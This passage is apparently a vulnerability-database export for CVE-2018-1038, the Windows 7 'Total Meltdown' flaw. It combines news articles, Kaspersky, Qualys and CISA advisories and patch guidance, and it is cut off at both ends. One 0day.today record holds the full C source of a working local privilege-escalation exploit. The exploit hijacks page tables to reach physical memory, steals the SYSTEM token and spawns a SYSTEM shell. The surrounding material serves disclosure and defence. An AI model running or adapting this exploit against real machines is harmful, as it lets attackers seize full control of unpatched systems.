fancy APIs or syscalls required - just standard read and write!\"\n\nOnce read/write access has been gained to the page tables, it would be \"trivially easy\" to gain access to the entire physical memory, \"unless it is additionally protected by Extended Page Tables (EPTs) used for Virtualization,\" Frisk said. \n \nAll attackers have to do is to write their own Page Table Entries (PTEs) into the page tables in order to access arbitrary physical memory. \n \nFrisk said he has not been able to link the new vulnerability to anything on the public list of Common Vulnerabilities and Exposures. He also invited researchers to test the flaw using an exploit kit he released on GitHub. \n \n\n\n### **UPDATE: Microsoft Releases Emergency Patch**\n\nIn the wake of the researcher's finding, Microsoft released an emergency patch on Thursday for the vulnerability (CVE-2018-1038) introduced as a Meltdown patch issued by the company earlier this year. \n \n\n\n> The out-of-band security update for Microsoft Windows 7 and Windows Server 2008 R2 \"addresses an elevation of privilege vulnerability in the Windows kernel in the 64-Bit (x64) version of Windows.\"\n\n \nAccording to the Microsoft [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1038>), the elevation of privilege flaw occurs when the Windows kernel fails to handle objects in memory properly. Successfully exploitation of this flaw could allow an attacker to run arbitrary code in kernel mode. \n \n\n\n> \"An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,\" the advisory states.\n\n \nNo other Windows OS version is impacted, except Windows 7 Service Pack 1 (x64) and Windows Server 2008 R2 Service Pack 1 (x64). \n \nSo all admins and users of Windows 7 and Windows 2008R2 are strongly recommended to update their systems as soon as possible.\n", "modified": "2018-03-31T09:38:13", "published": "2018-03-29T03:36:00", "id": "THN:7354CA31230FA4D48BE905015B9C3B76", "href": "https://thehackernews.com/2018/03/microsofts-meltdown-vulnerability.html", "type": "thn", "title": "Microsoft's Meltdown Patch Made Windows 7 PCs More Insecure", "cvss": {"score": 0.0, "vector": "NONE"}}], "kaspersky": [{"lastseen": "2020-09-02T11:52:59", "bulletinFamily": "info", "cvelist": ["CVE-2018-1038"], "description": "### *Detect date*:\n03/29/2018\n\n### *Severity*:\nHigh\n\n### *Description*:\nPE vulnerability was found in Microsoft Products (Extended Support Update). Malicious users can exploit this vulnerability to gain privileges.\n\n### *Affected products*:\nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 7 for 32-bit Systems Service Pack 1\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-1038](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-1038>) \n\n\n### *Impacts*:\nPE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2018-1038](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1038>)0.0Unknown\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4100480](<http://support.microsoft.com/kb/4100480>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 33, "modified": "2020-06-18T00:00:00", "published": "2018-03-29T00:00:00", "id": "KLA11219", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11219", "title": "\r KLA11219PE vulnerability in Microsoft Products (ESU) ", "type": "kaspersky", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-05-07T06:31:58", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2018-05-03T00:00:00", "title": "Windows - Local Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-1038"], "modified": "2018-05-03T00:00:00", "id": "1337DAY-ID-30292", "href": "https://0day.today/exploit/description/30292", "sourceData": "#include \"stdafx.h\"\r\n \r\n#define PML4_BASE 0xFFFFF6FB7DBED000\r\n#define PDP_BASE 0xFFFFF6FB7DA00000\r\n#define PD_BASE 0xFFFFF6FB40000000\r\n#define PT_BASE 0xFFFFF68000000000\r\n \r\ntypedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;\r\n \r\n#pragma pack(push,4)\r\ntypedef struct _CM_PARTIAL_RESOURCE_DESCRIPTOR {\r\n UCHAR Type;\r\n UCHAR ShareDisposition;\r\n USHORT Flags;\r\n union {\r\n struct {\r\n PHYSICAL_ADDRESS Start;\r\n ULONG Length;\r\n } Generic;\r\n \r\n struct {\r\n PHYSICAL_ADDRESS Start;\r\n ULONG Length;\r\n } Port;\r\n \r\n struct {\r\n#if defined(NT_PROCESSOR_GROUPS)\r\n USHORT Level;\r\n USHORT Group;\r\n#else\r\n ULONG Level;\r\n#endif\r\n ULONG Vector;\r\n KAFFINITY Affinity;\r\n } Interrupt;\r\n \r\n struct {\r\n union {\r\n struct {\r\n#if defined(NT_PROCESSOR_GROUPS)\r\n USHORT Group;\r\n#else\r\n USHORT Reserved;\r\n#endif\r\n USHORT MessageCount;\r\n ULONG Vector;\r\n KAFFINITY Affinity;\r\n } Raw;\r\n \r\n struct {\r\n#if defined(NT_PROCESSOR_GROUPS)\r\n USHORT Level;\r\n USHORT Group;\r\n#else\r\n ULONG Level;\r\n#endif\r\n ULONG Vector;\r\n KAFFINITY Affinity;\r\n } Translated;\r\n } DUMMYUNIONNAME;\r\n } MessageInterrupt;\r\n \r\n struct {\r\n PHYSICAL_ADDRESS Start; \r\n ULONG Length;\r\n } Memory;\r\n \r\n struct {\r\n ULONG Channel;\r\n ULONG Port;\r\n ULONG Reserved1;\r\n } Dma;\r\n \r\n struct {\r\n ULONG Channel;\r\n ULONG RequestLine;\r\n UCHAR TransferWidth;\r\n UCHAR Reserved1;\r\n UCHAR Reserved2;\r\n UCHAR Reserved3;\r\n } DmaV3;\r\n \r\n struct {\r\n ULONG Data[3];\r\n } DevicePrivate;\r\n \r\n struct {\r\n ULONG Start;\r\n ULONG Length;\r\n ULONG Reserved;\r\n } BusNumber;\r\n \r\n struct {\r\n ULONG DataSize;\r\n ULONG Reserved1;\r\n ULONG Reserved2;\r\n } DeviceSpecificData;\r\n \r\n struct {\r\n PHYSICAL_ADDRESS Start;\r\n ULONG Length40;\r\n } Memory40;\r\n \r\n struct {\r\n PHYSICAL_ADDRESS Start;\r\n ULONG Length48;\r\n } Memory48;\r\n \r\n struct {\r\n PHYSICAL_ADDRESS Start;\r\n ULONG Length64;\r\n } Memory64;\r\n \r\n struct {\r\n UCHAR Class;\r\n UCHAR Type;\r\n UCHAR Reserved1;\r\n UCHAR Reserved2;\r\n ULONG IdLowPart;\r\n ULONG IdHighPart;\r\n } Connection;\r\n \r\n } u;\r\n} CM_PARTIAL_RESOURCE_DESCRIPTOR, *PCM_PARTIAL_RESOURCE_DESCRIPTOR;\r\n#pragma pack(pop,4)\r\n \r\ntypedef enum _INTERFACE_TYPE {\r\n InterfaceTypeUndefined,\r\n Internal,\r\n Isa,\r\n Eisa,\r\n MicroChannel,\r\n TurboChannel,\r\n PCIBus,\r\n VMEBus,\r\n NuBus,\r\n PCMCIABus,\r\n CBus,\r\n MPIBus,\r\n MPSABus,\r\n ProcessorInternal,\r\n InternalPowerBus,\r\n PNPISABus,\r\n PNPBus,\r\n Vmcs,\r\n ACPIBus,\r\n MaximumInterfaceType\r\n} INTERFACE_TYPE, *PINTERFACE_TYPE;\r\n \r\ntypedef struct _CM_PARTIAL_RESOURCE_LIST {\r\n USHORT Version;\r\n USHORT Revision;\r\n ULONG Count;\r\n CM_PARTIAL_RESOURCE_DESCRIPTOR PartialDescriptors[1];\r\n} CM_PARTIAL_RESOURCE_LIST, *PCM_PARTIAL_RESOURCE_LIST;\r\n \r\ntypedef struct _CM_FULL_RESOURCE_DESCRIPTOR {\r\n INTERFACE_TYPE InterfaceType;\r\n ULONG BusNumber;\r\n CM_PARTIAL_RESOURCE_LIST PartialResourceList;\r\n} *PCM_FULL_RESOURCE_DESCRIPTOR, CM_FULL_RESOURCE_DESCRIPTOR;\r\n \r\ntypedef struct _CM_RESOURCE_LIST {\r\n ULONG Count;\r\n CM_FULL_RESOURCE_DESCRIPTOR List[1];\r\n} *PCM_RESOURCE_LIST, CM_RESOURCE_LIST;\r\n \r\nstruct memory_region {\r\n ULONG64 size;\r\n ULONG64 address;\r\n};\r\n \r\n// Very hack'y way of trying to map out physical memory regions to try and reduce\r\n// risk of BSOD\r\nDWORD parse_memory_map(struct memory_region *regions) {\r\n HKEY hKey = NULL;\r\n LPTSTR pszSubKey = L\"Hardware\\\\ResourceMap\\\\System Resources\\\\Physical Memory\";\r\n LPTSTR pszValueName = L\".Translated\";\r\n LPBYTE lpData = NULL;\r\n DWORD dwLength = 0, count = 0, type = 0;;\r\n \r\n if (!RegOpenKey(HKEY_LOCAL_MACHINE, pszSubKey, &hKey) == ERROR_SUCCESS)\r\n {\r\n printf(\"[*] Could not get reg key\\n\");\r\n return 0;\r\n }\r\n \r\n if (!RegQueryValueEx(hKey, pszValueName, 0, &type, NULL, &dwLength) == ERROR_SUCCESS)\r\n {\r\n printf(\"[*] Could not query hardware key\\n\");\r\n return 0;\r\n }\r\n \r\n lpData = (LPBYTE)malloc(dwLength);\r\n RegQueryValueEx(hKey, pszValueName, 0, &type, lpData, &dwLength);\r\n \r\n CM_RESOURCE_LIST *resource_list = (CM_RESOURCE_LIST *)lpData;\r\n \r\n for (int i = 0; i < resource_list->Count; i++) {\r\n for (int j = 0; j < resource_list->List[0].PartialResourceList.Count; j++) {\r\n if (resource_list->List[i].PartialResourceList.PartialDescriptors[j].Type == 3) {\r\n regions->address = resource_list->List[i].PartialResourceList.PartialDescriptors[j].u.Memory.Start.QuadPart;\r\n regions->size = resource_list->List[i].PartialResourceList.PartialDescriptors[j].u.Memory.Length;\r\n regions++;\r\n count++;\r\n }\r\n }\r\n }\r\n \r\n return count;\r\n}\r\n \r\nint main()\r\n{\r\n printf(\"TotalMeltdown PrivEsc exploit by @_xpn_\\n\");\r\n printf(\" paging code by @UlfFrisk\\n\\n\");\r\n \r\n unsigned long long iPML4, vaPML4e, vaPDPT, iPDPT, vaPD, iPD;\r\n DWORD done;\r\n DWORD count;\r\n \r\n // Parse registry for physical memory regions\r\n printf(\"[*] Getting physical memory regions from registry\\n\");\r\n struct memory_region *regions = (struct memory_region *)malloc(sizeof(struct memory_region) * 10);\r\n \r\n count = parse_memory_map(regions);\r\n if (count == 0) {\r\n printf(\"[X] Could not find physical memory region, quitting\\n\");\r\n return 2;\r\n }\r\n \r\n for (int i = 0; i < count; i++) {\r\n printf(\"[*] Phyiscal memory region found: %p - %p\\n\", regions[i].address, regions[i].address + regions[i].size);\r\n }\r\n \r\n // Check for vulnerability\r\n __try {\r\n int test = *(unsigned long long *)PML4_BASE;\r\n }\r\n __except (EXCEPTION_EXECUTE_HANDLER) {\r\n printf(\"[X] Could not access PML4 address, system likely not vulnerable\\n\");\r\n return 2;\r\n }\r\n \r\n // setup: PDPT @ fixed hi-jacked physical address: 0x10000\r\n // This code uses the PML4 Self-Reference technique discussed, and iterates until we find a \"free\" PML4 entry\r\n // we can hijack.\r\n for (iPML4 = 256; iPML4 < 512; iPML4++) {\r\n vaPML4e = PML4_BASE + (iPML4 << 3);\r\n if (*(unsigned long long *)vaPML4e) { continue; }\r\n \r\n // When we find an entry, we add a pointer to the next table (PDPT), which will be\r\n // stored at the physical address 0x10000\r\n *(unsigned long long *)vaPML4e = 0x10067;\r\n break;\r\n }\r\n printf(\"[*] PML4 Entry Added At Index: %d\\n\", iPML4);\r\n \r\n // Here, the PDPT table is referenced via a virtual address.\r\n // For example, if we added our hijacked PML4 entry at index 256, this virtual address\r\n // would be 0xFFFFF6FB7DA00000 + 0x100000\r\n // This allows us to reference the physical address 0x10000 as:\r\n // PML4 Index: 1ed | PDPT Index : 1ed | PDE Index : 1ed | PT Index : 100\r\n vaPDPT = PDP_BASE + (iPML4 << (9 * 1 + 3));\r\n printf(\"[*] PDPT Virtual Address: %p\", vaPDPT);\r\n \r\n // 2: setup 31 PDs @ physical addresses 0x11000-0x1f000 with 2MB pages\r\n // Below is responsible for adding 31 entries to the PDPT\r\n for (iPDPT = 0; iPDPT < 31; iPDPT++) {\r\n *(unsigned long long *)(vaPDPT + (iPDPT << 3)) = 0x11067 + (iPDPT << 12);\r\n }\r\n \r\n // For each of the PDs, a further 512 PT's are created. This gives access to\r\n // 512 * 32 * 2mb = 33gb physical memory space\r\n for (iPDPT = 0; iPDPT < 31; iPDPT++) {\r\n if ((iPDPT % 3) == 0)\r\n printf(\"\\n[*] PD Virtual Addresses: \");\r\n \r\n vaPD = PD_BASE + (iPML4 << (9 * 2 + 3)) + (iPDPT << (9 * 1 + 3));\r\n printf(\"%p \", vaPD);\r\n \r\n for (iPD = 0; iPD < 512; iPD++) {\r\n // Below, notice the 0xe7 flags added to each entry.\r\n // This is used to create a 2mb page rather than the standard 4096 byte page.\r\n *(unsigned long long *)(vaPD + (iPD << 3)) = ((iPDPT * 512 + iPD) << 21) | 0xe7;\r\n }\r\n }\r\n \r\n printf(\"\\n[*] Page tables created, we now have access to ~31gb of physical memory\\n\");\r\n \r\n #define EPROCESS_IMAGENAME_OFFSET 0x2e0\r\n #define EPROCESS_TOKEN_OFFSET 0x208\r\n #define EPROCESS_PRIORITY_OFFSET 0xF // This is the offset from IMAGENAME, not from base\r\n \r\n unsigned long long ourEPROCESS = 0, systemEPROCESS = 0;\r\n unsigned long long exploitVM = 0xffff000000000000 + (iPML4 << (9 * 4 + 3));\r\n STARTUPINFOA si;\r\n PROCESS_INFORMATION pi;\r\n \r\n ZeroMemory(&si, sizeof(si));\r\n si.cb = sizeof(si);\r\n ZeroMemory(&pi, sizeof(pi));\r\n \r\n printf(\"[*] Hunting for _EPROCESS structures in memory\\n\");\r\n \r\n for (int j = 0; j < count; j++) {\r\n printf(\"[*] Trying physical region %p - %p\\n\", regions[j].address, regions[j].address + regions[j].size);\r\n \r\n for (unsigned long long i = regions[j].address; i < +regions[j].address + regions[j].size; i++) {\r\n \r\n __try {\r\n // Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field\r\n if (ourEPROCESS == 0 && memcmp(\"TotalMeltdownP\", (unsigned char *)(exploitVM + i), 14) == 0) {\r\n if (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) {\r\n ourEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET;\r\n printf(\"[*] Found our _EPROCESS at %p\\n\", ourEPROCESS);\r\n }\r\n }\r\n // Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field\r\n else if (systemEPROCESS == 0 && memcmp(\"System\\0\\0\\0\\0\\0\\0\\0\\0\\0\", (unsigned char *)(exploitVM + i), 14) == 0) {\r\n if (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) {\r\n systemEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET;\r\n printf(\"[*] Found System _EPROCESS at %p\\n\", systemEPROCESS);\r\n }\r\n }\r\n \r\n if (systemEPROCESS != 0 && ourEPROCESS != 0) {\r\n // Swap the tokens by copying the pointer to System Token field over our process token\r\n printf(\"[*] Copying access token from %p to %p\\n\", systemEPROCESS + EPROCESS_TOKEN_OFFSET, ourEPROCESS + EPROCESS_TOKEN_OFFSET);\r\n *(unsigned long long *)((char *)ourEPROCESS + EPROCESS_TOKEN_OFFSET) = *(unsigned long long *)((char *)systemEPROCESS + EPROCESS_TOKEN_OFFSET);\r\n printf(\"[*] Done, spawning SYSTEM shell...\\n\\n\");\r\n \r\n CreateProcessA(0,\r\n \"cmd.exe\",\r\n NULL,\r\n NULL,\r\n TRUE,\r\n 0,\r\n NULL,\r\n \"C:\\\\windows\\\\system32\",\r\n &si,\r\n &pi);\r\n break;\r\n }\r\n }\r\n __except (EXCEPTION_EXECUTE_HANDLER) {\r\n printf(\"[X] Exception occured, stopping to avoid BSOD\\n\");\r\n return 2;\r\n }\r\n }\r\n }\r\n return 0;\r\n}\n\n# 0day.today [2018-05-07] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30292"}], "qualysblog": [{"lastseen": "2019-01-23T20:50:13", "bulletinFamily": "blog", "cvelist": ["CVE-2018-1038"], "description": "The [Meltdown/Spectre saga](<https://blog.qualys.com/news/2018/01/16/meltdown-spectre-mitigation-is-a-work-in-progress#resources>) continues\u2026\n\nLate Thursday, Microsoft released a patch for Windows 7 and Server 2008 R2 operating systems to resolve [CVE-2018-1038](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038>). Apparently, this vulnerability was actually introduced by the patches released in January to mitigate the effects of Meltdown. Microsoft did include a partial fix in the [March updates](<https://blog.qualys.com/laws-of-vulnerabilities/2018/03/13/march-patch-tuesday-75-microsoft-vulnerabilities-2-for-adobe>) on [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), but did not completely resolve the issue.\n\nAccording to a [blog post by Ulf Frisk](<http://blog.frizk.net/2018/03/total-meltdown.html?m=1>), some of the modifications to memory handling opened up read/write access to User mode code, essentially allowing any application on the machine to read and write from memory.\n\nQualys has created QID 91440 in [Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>). This detection requires authenticated scanning or a[ Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) installed on the asset, and looks for the presence of the vulnerable version of ntoskrnl.exe. \n\nIt should be noted that while there are no current active attacks against this vulnerability, there _is_ PoC code, and opportunistic actors could weaponize this exploit by using a multi-stage attack to gain access to an affected asset.\n\n**The bottom line**: If you did install any of the security updates in January of this year or later, it is critical that you install this out-of-band patch to ensure your systems are protected from malicious actors. Also ensure that other layers of protection (anti-malware, email security, web filtering) are up to date to minimize your risk profile.", "modified": "2018-03-30T19:05:27", "published": "2018-03-30T19:05:27", "id": "QUALYSBLOG:825B1704EC215DE72477ABECB37BD7CB", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2018/03/30/a-patch-for-the-meltdown-patch-released-out-of-band-thursday-night", "type": "qualysblog", "title": "A \u201cPatch for the Meltdown Patch\u201d released out of band Thursday night", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T20:50:12", "bulletinFamily": "blog", "cvelist": ["CVE-2018-1038", "CVE-2018-7600"], "description": "In our weekly roundup of InfoSec happenings, we start, as has often been the case this year, with concerning Meltdown / Spectre news -- this time involving Microsoft -- and also touch on a password hack at Under Armour, a WannaCry infection at Boeing, and a severe Drupal vulnerability.\n\n### Microsoft patches its Meltdown patch, then patches it again\n\nIn an instance of the cure possibly being worse than the disease, a Microsoft patch for Meltdown released in January created a gaping security hole in certain systems in which it was installed.\n\n\n\nIt took Microsoft two tries to fix the issue, which affects Windows 7 (x64) and Windows Server 2008 R2 (x64) systems. The company thought it had solved the vulnerability ([CVE-2018-1038](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038>)) with a scheduled patch last Tuesday, but then had to rush out an emergency fix two days later.\n\nSecurity researcher Ulf Frisk, who discovered the vulnerability, [called it](<http://blog.frizk.net/2018/03/total-meltdown.html?m=1>) \u201cway worse\u201d than Meltdown because it \u201callowed any process to read the complete memory contents at gigabytes per second\u201d and made it possible to write to arbitrary memory as well.\n\n\u201cNo fancy exploits were needed. Windows 7 already did the hard work of mapping in the required memory into every running process,\u201d Frisk wrote. \u201cExploitation was just a matter of read and write to already mapped in-process virtual memory. No fancy APIs or syscalls required -- just standard read and write.\u201d\n\nAs Qualys\u2019 Director of Product Management for Patch Management Gill Langston [wrote](<https://blog.qualys.com/laws-of-vulnerabilities/2018/03/30/a-patch-for-the-meltdown-patch-released-out-of-band-thursday-night>) in this blog, there are no current active attacks against this vulnerability but there is proof-of-concept code. \u201cOpportunistic actors could weaponize this exploit by using a multi-stage attack to gain access to an affected asset,\u201d he warned.\n\nLangston recommends that organizations install Thursday\u2019s out-of-band patch if they installed any of the security updates in January of this year or later. \u201cAlso ensure that other layers of protection (anti-malware, email security, web filtering) are up to date to minimize your risk profile,\u201d he wrote.\n\nQualys created QID 91440 in [Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>). Detection requires authenticated scanning or a[ Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) installed on the asset.\n\n### Under Armour\u2019s MyFitnessPal app passwords swiped\n\nCyber thieves stole usernames, email addresses, and hashed passwords from 150 million accounts of Under Armour\u2019s MyFitnessPal app at some point during February. Those affected must change their MyFitnessPal app passwords immediately, and should do the same on any other online account in which they\u2019ve used that same password.\n\nThey also should be vigilant about suspicious activity on all their other online accounts, and about unsolicited requests to provide personal information, visit webpages, click on email links or download attachments.\n\n\n\nUnder Armour, a sports apparel maker, made no mention in its [breach notice](<https://content.myfitnesspal.com/security-information/notice.html>) of how the hackers were able to access the data. The company discovered the hack last week.\n\nOver at Sophos\u2019[ Naked Security blog](<https://nakedsecurity.sophos.com/2018/03/30/150-million-myfitnesspal-accounts-compromised-heres-what-to-do/>), Mark Stockley points out that the hackers had at least a month \u201cto send targeted MyFitnessPal phishing emails, to crack the stolen password hashes, and to try any cracked passwords on other services (such as social media accounts).\u201d\n\n\u201cSince the information at risk can be used to log in to your MyFitnessPal account, all the data you see when you log in to your account is also at risk,\u201d he added.\n\n[Writing in Wired](<https://www.wired.com/story/under-armour-myfitnesspal-hack-password-hashing/>), Lily Hay Newman makes a thorough analysis of the hack, and of what Under Armour did well (quick disclosure, system segmentation, use of \u201cbcrypt\u201d hashing function) and not so well (use of SHA-1 hashing function).\n\n### WannaCry infects Boeing systems\n\nIf you thought WannaCry was oh so 2017, think again. The notorious ransomware grabbed headlines again last week when [news broke](<https://www.seattletimes.com/business/boeing-aerospace/boeing-hit-by-wannacry-virus-fears-it-could-cripple-some-jet-production/>) that it had cropped up at giant airplane manufacturer Boeing.\n\nWhen it was first detected, Boeing leaders feared the worst, including manufacturing process disruptions, but when the dust cleared it seems the damage was[ quickly contained and pretty limited](<https://twitter.com/BoeingAirplanes/status/979134166959783937>).\n\n\u201cWe\u2019ve done a final assessment,\u201d Linda Mills, the head of communications for Boeing Commercial Airplanes, told The Seattle Times. \u201cThe vulnerability was limited to a few machines. We deployed software patches. There was no interruption to the 777 jet program or any of our programs.\u201d\n\nStill, the incident serves as a good reminder that WannaCry -- formal name WanaCrypt0r 2.0 -- spreads using an exploit called EternalBlue for Windows OS vulnerabilities that Microsoft patched in March 2017, so more than a year ago now.\n\nThe vulnerabilities, in Windows\u2019 SMB (Server Message Block) protocol and described in [security bulletin MS17-010](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>), were rated \u201cCritical\u201d at the time by Microsoft due to the potential for attackers to execute remote code in affected systems.\n\nWriting in Sophos\u2019 Naked Security blog, John E. Dunn suggests that systems remain unpatched for WannaCry because remediating these vulnerabilities isn\u2019t always straightforward.\n\n\u201cOne reason for this persistence is that WannaCry doesn\u2019t just affect regular desktops, laptops and servers, but also spreads to and from unpatched Windows 7 systems of the sort widely used in manufacturing as Windows Embedded,\u201d Dunn [wrote](<https://nakedsecurity.sophos.com/2018/03/29/boeing-hit-by-wannacry-reminding-everyone-the-threat-is-still-there/>).\n\nHere\u2019s [more information](<https://community.qualys.com/docs/DOC-6110?_ga=2.192879138.925004837.1522623823-480546418.1484260199>) on how to detect and address the MS17-010 vulnerabilities with Qualys products.\n\nOther WannaCry resources from Qualys include:\n\n * Detailed walkthrough of [how to report on it](<https://community.qualys.com/docs/DOC-6111?_ga=2.197079204.925004837.1522623823-480546418.1484260199>) for those new to Qualys.\n * Detailed walkthrough of [how to build WannaCry dashboards](<https://community.qualys.com/docs/DOC-6122-how-to-create-assetview-widgets-to-report-on-wannacry?_ga=2.197079204.925004837.1522623823-480546418.1484260199>) in AssetView. Also available as a [webcast](<https://lps.qualys.com/visualize-your-threat-exposure-to-wannacry-and-shadow-brokers-with-dashboards.html?_ga=2.197079204.925004837.1522623823-480546418.1484260199>).\n * [De-duping WannaCry detections](<https://community.qualys.com/thread/17321-de-duping-wannacry?_ga=2.197079204.925004837.1522623823-480546418.1484260199>)\n * [On-demand WannaCry webcast](<https://lps.qualys.com/rapidly-identify-assets-risk-wannacry-ransomware.html?utm_source=blog&utm_medium=website&utm_campaign=demand-gen&utm_term=wannacry-q2-2017&utm_content=webcast&leadsource=344554153&_ga=2.197079204.925004837.1522623823-480546418.1484260199>), [summary](<https://blog.qualys.com/news/2017/05/19/no-more-tears-wannacry-highlights-importance-of-prompt-precise-vulnerability-remediation>) and [transcript of participant Q&amp;A](<https://blog.qualys.com/technology/2017/05/23/digging-into-wannacry-details-answers-to-your-burning-questions>) showing how to identify at-risk assets and institute threat-prioritized remediation processes for current and future risks.\n * [First-hand perspective](<http://www.techrepublic.com/article/patching-wannacrypt-dispatches-from-the-frontline/>) of how one company kept the threat under control (via TechRepublic)\n * Technical Resources and Detection Methods for WannaCry related QIDs are found in the WannaCry Support Article: [Qualys response for Global Ransomware Attack (WannaCry)](<https://qualys.secure.force.com/articles/How_To/000001942>)\n\n### \n\n \n\n\n\n### Drupal: Highly critical vulnerability affects 1M+ websites\n\nAs it had recently [promised](<https://www.drupal.org/psa-2018-001>), Drupal last week released a patch for a remote code execution vulnerability it rated as \u201chighly critical\u201d that affects multiple subsystems of Drupal 7.x and 8.x.\n\n\u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d Drupal [warned](<https://www.drupal.org/sa-core-2018-002>) in its advisory.\n\n\n\nIn a companion [FAQ](<https://groups.drupal.org/security/faq-2018-002>), the Drupal security team pegged the scope of affected systems at 9% of sites using its CMS (content management system) platform, or more than 1 million sites. \n\nWhile Drupal has no knowledge of successful exploits of this vulnerability, it nonetheless recommends immediate remediation because \u201csite owners should anticipate that exploits may be developed and should therefore update their sites immediately.\u201d\n\nThe solution: Upgrade to the most recent version of Drupal 7 or 8 core.\n\nSpecifically, those running 7.x should upgrade to [Drupal 7.58](<https://www.drupal.org/project/drupal/releases/7.58>), or alternatively apply [this patch](<https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&id=2266d2a83db50e2f97682d9a0fb8a18e2722cba5>) on systems that can\u2019t be immediately upgraded. Meanwhile, those running 8.5.x should upgrade to [Drupal 8.5.1](<https://www.drupal.org/project/drupal/releases/8.5.1>), or apply [this patch](<https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f>) on systems that can\u2019t be immediately upgraded. The FAQ states that Drupal 6 is also affected and points users of that version to its [long term support page](<https://www.drupal.org/project/d6lts>).\n\nWriting in the Qualys Community site, Dave Ferguson, Director of Product Management for Web Application Scanning at Qualys, [called](<https://community.qualys.com/docs/DOC-6373-was-and-newly-discovered-drupal-vulnerabilities>) the vulnerability ([CVE-2018-7600](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600>)) \u201cvery dangerous.\u201d \n\nAccording to Ferguson, customers using Qualys Web Application Scanning (WAS) to scan all their websites on a regular basis can quickly find out if they\u2019re running a vulnerable Drupal version without having to run additional scans. \n\n\u201cSimply open WAS and go to Detections. In the search field, enter \"150183\" (this is the WAS QID reported when Drupal CMS is detected). If WAS has identified any web apps running Drupal, you will see QID 150183 listed in the detections. Open each detection and look at the Results section to see the version of Drupal running on that site. If necessary, start the patching process,\u201d Ferguson wrote.\n\n### In other infosec news \u2026\n\n * The city government of Atlanta, which recently suffered a serious[ ransomware attack](<https://www.csoonline.com/article/3264654/security/atlanta-officials-still-working-around-the-clock-to-resolve-ransomware-attack.html>) that disrupted operations, was warned months ago that its IT systems were riddled with \u201csevere and critical vulnerabilities\u201d that put them in serious danger of cyber attacks, [according to CBS46](<http://www.cbs46.com/story/37821878/internal-audit-shows-city-knew-of-it-vulnerabilities>), the local CBS affiliate. \n * Hackers breached a Baltimore city government server, impacting the city\u2019s 911 system, as [reported](<http://www.baltimoresun.com/news/maryland/crime/bs-md-ci-911-hacked-20180327-story.html>) by The Baltimore Sun.\n * Cryptocurrency Monero may not be as private as previously thought, according to a [research report](<https://arxiv.org/pdf/1704.04299.pdf>) published last week. Sophos\u2019 Naked Security blog has a [take](<https://nakedsecurity.sophos.com/2018/03/28/unmasking-monero-stripping-the-currencys-privacy-protection/>) on the research, as does [Wired](<https://www.wired.com/story/monero-privacy/>), while Coindesk [dismisses](<https://www.coindesk.com/broken-privacy-the-allegations-against-monero-are-old-news/>) the findings as \u201cold news.\u201d", "modified": "2018-04-02T18:02:51", "published": "2018-04-02T18:02:51", "id": "QUALYSBLOG:D57DEDE8164E21BF8EE0C81B50AAA328", "href": "https://blog.qualys.com/news/2018/04/02/microsoft-misfires-with-meltdown-patch-while-wannacry-pops-up-at-boeing", "type": "qualysblog", "title": "Microsoft Misfires with Meltdown Patch, while WannaCry Pops Up at Boeing", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cisa": [{"lastseen": "2020-12-18T18:07:18", "bulletinFamily": "info", "cvelist": ["CVE-2018-1038"], "description": "Microsoft has released security updates to address a vulnerability in Windows 7 x64 and Windows Server 2008 R2 x64 systems. Exploitation of this vulnerability may allow an attacker to take control of an affected system.\n\nNCCIC/US-CERT encourages users and administrators to review [Vulnerability Note VU#277400](<https://www.kb.cert.org/vuls/id/277400>) and [Microsoft\u2019s 